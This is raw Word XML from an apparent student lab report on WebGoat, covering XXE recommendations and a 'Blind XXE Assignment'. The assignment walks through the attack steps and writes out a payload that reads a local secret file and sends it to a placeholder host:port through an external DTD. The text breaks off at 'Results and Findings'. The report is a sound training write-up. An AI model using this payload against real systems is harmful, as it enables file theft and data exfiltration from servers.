    <w:p w14:paraId="20DBC496" w14:textId="5FD503EF" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A115F7F" w14:textId="75001FA0" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77895D08" w14:textId="70405CE2" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BC2EA33" w14:textId="07D3BB82" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Implement strict validation of Content-Type headers to prevent manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9F8EC1" w14:textId="4F77510A" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Employ input validation for all incoming data to mitigate XXE vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17344F11" w14:textId="78D244E3" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Regularly review and update security configurations to address emerging threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA078E" w14:textId="7243D0D3" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Reflection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D90BE41" w14:textId="3528AA46" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The exercise underscores the importance of a multi-layered security approach, including proper validation of headers and inputs, to prevent unexpected exploitation. In the future, more emphasis on secure coding practices and input validation would be crucial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DFC47E" w14:textId="1EA1E858" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0781D970" w14:textId="0D1E76D5" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7F51FD" w14:textId="5744F2CA" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E792881" w14:textId="6027921E" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>OWASP XML External Entity (XXE) Prevention Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0913D5A7" w14:textId="465C416E" w:rsidR="00BE5C4F" w:rsidRPr="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Browser Development Tools Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D5B38B" w14:textId="1BA68F24" w:rsidR="00BE5C4F" w:rsidRDefault="00BE5C4F" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C4F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WebGoat Project Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CA1450" w14:textId="46CA4B2A" w:rsidR="003C3023" w:rsidRDefault="00916680" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="795829DD" wp14:editId="2B60A8A3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>160331</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>4785543</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1192530" cy="894715"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="61347193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71938" name="Picture 1" descr="A computer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2530" cy="894715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41329F10" w14:textId="49D36D6F" w:rsidR="00916680" w:rsidRPr="00E0545D" w:rsidRDefault="00916680" w:rsidP="00E0545D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3832D66D" wp14:editId="3DBDA679">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1454851</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>4820780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1117600" cy="807085"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="178338252"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8252" name="Picture 2" descr="A computer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7600" cy="807085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="636DDAE0" w14:textId="77777777" w:rsidR="00916680" w:rsidRDefault="00916680" w:rsidP="009F6314">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3079137B" w14:textId="77777777" w:rsidR="00916680" w:rsidRDefault="00916680" w:rsidP="009F6314">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="377ECDC9" w14:textId="77777777" w:rsidR="00916680" w:rsidRDefault="00916680" w:rsidP="009F6314">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D48592D" w14:textId="77777777" w:rsidR="00916680" w:rsidRDefault="00916680" w:rsidP="009F6314">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E1AE9E" w14:textId="16A9705D" w:rsidR="003C3023" w:rsidRPr="009F6314" w:rsidRDefault="003C3023" w:rsidP="009F6314">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>A5 -XXE, Blind</w:t>
      </w:r>
      <w:r w:rsidR="00080408" w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXE Assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022C610B" w14:textId="77777777" w:rsidR="00080408" w:rsidRDefault="00080408" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="681D3056" w14:textId="77777777" w:rsidR="00080408" w:rsidRDefault="00080408" w:rsidP="00BE5C4F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FDBCAA2" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Exercise Title and Objective: "Blind XXE Attack on WebGoat with External Entity Inclusion"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF98623" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Objective: Evaluate the susceptibility of WebGoat to a blind XXE attack, exploiting an external entity inclusion vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289BCC06" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BEEDDD0" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Methodology: Used the browser's Development Tools and Network tab to intercept and modify HTTP requests. Uploaded the contents_file.dtd on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WebWolf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> to set up the blind XXE attack, aiming to exfiltrate data from a specified file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C07A63" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1423EB2E" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Steps Taken:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4101F490" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C835892" w14:textId="1FF0A564" w:rsidR="001F24E6" w:rsidRPr="001F24E6" w:rsidRDefault="009F6314" w:rsidP="001F24E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556801">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploaded contents_file.dtd on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00556801">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WebWolf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00556801">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> to establish an external entity inclusion vulnerability.</w:t>
      </w:r>
      <w:r w:rsidR="001F24E6" w:rsidRPr="001F24E6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F24E6" w:rsidRPr="001F24E6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031022A4" w14:textId="75E9A876" w:rsidR="009F6314" w:rsidRPr="00556801" w:rsidRDefault="001F24E6" w:rsidP="001F24E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F24E6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;!ENTITY % all "&lt;!ENTITY send SYSTEM 'http://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F24E6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>host:port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F24E6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/landing?%file;' &gt;" &gt;%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F24E6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>all;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1D0D9764" w14:textId="77777777" w:rsidR="009F6314" w:rsidRDefault="009F6314" w:rsidP="00556801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556801">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Opened WebGoat and accessed the comment posting feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E65BB4" w14:textId="735BABFF" w:rsidR="005619F2" w:rsidRPr="005619F2" w:rsidRDefault="005619F2" w:rsidP="005619F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Used ZAP/Burp as an intercepting proxy to capture and modify the XML request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D759872" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="00556801" w:rsidRDefault="009F6314" w:rsidP="00556801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556801">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Located the blind XXE query in the Network tab and initiated an Edit and Resend action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136611FA" w14:textId="77777777" w:rsidR="009F6314" w:rsidRDefault="009F6314" w:rsidP="00556801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556801">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Edited the request body with the specified XML payload and included the contents_file.dtd entity definitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33270FAF" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRPr="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009E7A2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9176C0" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRPr="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009E7A2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73859D35" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRPr="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009E7A2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;!ENTITY % file SYSTEM "file:///home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>webgoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/.webgoat-8.0.0.M25/XXE/secret.txt" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ECE506" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRPr="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009E7A2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;!ENTITY % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>dtd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "http://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>host:port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/files/username/contents_file.dtd" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061B113E" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRPr="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009E7A2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>dtd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="577126E1" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRPr="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009E7A2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AED57C9" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRPr="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009E7A2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;comment&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4D8FE3" w14:textId="77777777" w:rsidR="009E7A2F" w:rsidRPr="009E7A2F" w:rsidRDefault="009E7A2F" w:rsidP="009E7A2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;text&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>test&amp;send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>;&lt;/text&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277509F5" w14:textId="3095D773" w:rsidR="009E7A2F" w:rsidRPr="00556801" w:rsidRDefault="009E7A2F" w:rsidP="009E7A2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7A2F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;/comment&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B963C8" w14:textId="77777777" w:rsidR="00556801" w:rsidRDefault="00556801" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3465E2F6" w14:textId="4EA45E10" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6314">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Results and Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C0CE49" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="009F6314" w:rsidRDefault="009F6314" w:rsidP="009F6314">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B694F8" w14:textId="77777777" w:rsidR="009F6314" w:rsidRPr="00556801" w:rsidRDefault="009F6314" w:rsidP="00556801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
